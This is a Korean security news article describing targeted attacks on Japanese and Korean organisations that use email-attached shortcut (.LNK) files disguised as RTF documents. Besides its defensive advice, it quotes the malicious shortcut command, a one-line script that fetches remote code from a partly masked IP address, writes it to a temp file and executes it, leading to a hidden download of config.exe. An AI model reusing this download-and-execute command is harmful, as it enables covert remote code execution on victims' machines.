이메일에 첨부해 유포...의심스러운 메일의 첨부파일은 열지 말아야 

[보안뉴스 권 준] 최근 일본과 한국의 특정기관들을 노린 은밀한 방식의 지능형 표적공격이 진행하고 있는 것으로 알려져 주의가 요구된다.

지난 7월 중순경부터 8월초까지 일본과 한국의 특정기관들을 타깃으로 바로가기(.LNK) 파일형식을 가장한 지능형 표적공격 정황을 포착했다고 잉카인터넷 대응팀 측은 밝혔다. 

이 공격방식은 바로가기(.LNK) 파일형식으로 만들어져 있고, .LNK 내부에 삽입된 악의적 스크립트 코드 명령에 의해 특정 사이트로 연결되는 것으로 드러났다. 이 과정에서 이용자 몰래 EXE 악성파일을 추가로 다운로드하여 몰래 실행하는 일종의 원격실행 취약점이 작동하게 되는 것으로 분석됐다.

또한, 공격자들은 바로가기 파일이 마치 문서파일처럼 보이도록 하기 위해서 아이콘을 워드패드(RTF)로 위장하거나 실제 가짜 문서화면을 실행하여 이용자로 하여금 정상적인 문서파일로 인지하도록 현혹하는 것으로 알려졌다.

이러한 공격이 진행된 사례 가운데 하나로 최근 ‘필요한 자료.rtf.zip’ 파일명으로 유포된 경우가 있다. 이 파일에는 내부에 ‘필요한 자료.rtf.lnk’ 이름의 악성파일이 포함되어 있고, 문서파일처럼 보이도록 하기 위해서 2중 확장자로 만들어져 있는 것으로 알려졌다. 압축을 해제하면 다음과 같이 LNK 확장명은 보여지지 않고, RTF 문서포맷처럼 보여지는 것이다.

‘필요한 자료.rtf.lnk’ 파일은 내부적으로 바로가기 대상 내용에 악의적인 스크립트 코드를 포함해 두었기 때문에 특정 사이트로 연결되어 추가적인 스크립트 명령어가 실행되도록 하며 명령어는 임시폴더(Temp)에 ‘u.js’ 라는 이름으로 생성되고 실행된다.

%ComSpec% "/c echo try{x=new ActiveXObject("MSXML2.XMLHTTP");x.Open("GET","http://***.***.**.**/js?k=**********************************",0);x.Send();eval(x.responseText);}catch(e){;}>%tmp%\u.js&%tmp%\u.js"

추가로 접속되는 사이트에는 또 다시 스크립트 명령이 작동되도록 만들어져 있고, 이 파일은 10진수 코드값으로 암호화되어 있으나 실제로 ASCII 코드값으로 변환되면 특정 사이트에서 ‘application.rtf’ 파일과 ‘config.exe’ 파일을 다운로드하고 실행하는 명령어라는 점을 알 수 있다는 게 잉카인터넷 대응팀 측의 설명이다.

더욱이 정상적인 문서파일이 실행된 것처럼 보이도록 하기 위해서 다운로드한 정상적인 ‘application.rtf’ 문서 파일을 실행하여 보여준다. 하지만 사용자 컴퓨터에는 ‘config.exe’ 라는 악성파일이 이용자 몰래 다운로드되고 실행된다.

이 외에도 한국과 일본의 특정기관을 타깃으로 이와 유사한 악성파일을 유포한 사례가 다수 포착된 것으로 알려졌다.

이와 관련 잉카인터넷 대응팀 문종현 팀장은 “현재까지 한국과 일본을 상대로 한 공격 징후가 계속 발견되고 있는 상태이고, 대부분 바로가기 파일을 ZIP 등으로 압축하여 이메일에 첨부하는 유포기법을 이용하고 있다”며, “실제 문서파일의 취약점 공격은 아니기 때문에 기존의 문서기반 악성파일 탐지정책을 우회하거나 회피하기 위한 용도로 교묘하게 이용되고 있어 각별한 주의가 요구된다”고 밝혔다. 

덧붙여 그는 “바로가기 취약점을 이용해서 마치 문서파일처럼 위장한 악성파일이 증가하고 있고, 변종 악성파일이 다수 전파되고 있어 운영체제와 각종 응용프로그램은 항시 최신버전으로 유지하고 기본적인 보안수칙 준수가 필요하다”며, “이와 함께 의심스러운 이메일의 첨부파일은 가급적 열람하지 않도록 해야 한다”고 당부했다.

해당 악성파일은 아직까지 전 세계 대부분의 보안제품들이 탐지하지 못하고 있는 실정으로, 잉카인터넷 대응팀은 악성파일 변종들을 다수 확보하여 긴급 업데이트를 완료한 상태라고 설명했다. 

[권 준 기자(editor@boannews.com)]

<저작권자: 보안뉴스(http://www.boannews.com/) 무단전재-재배포금지>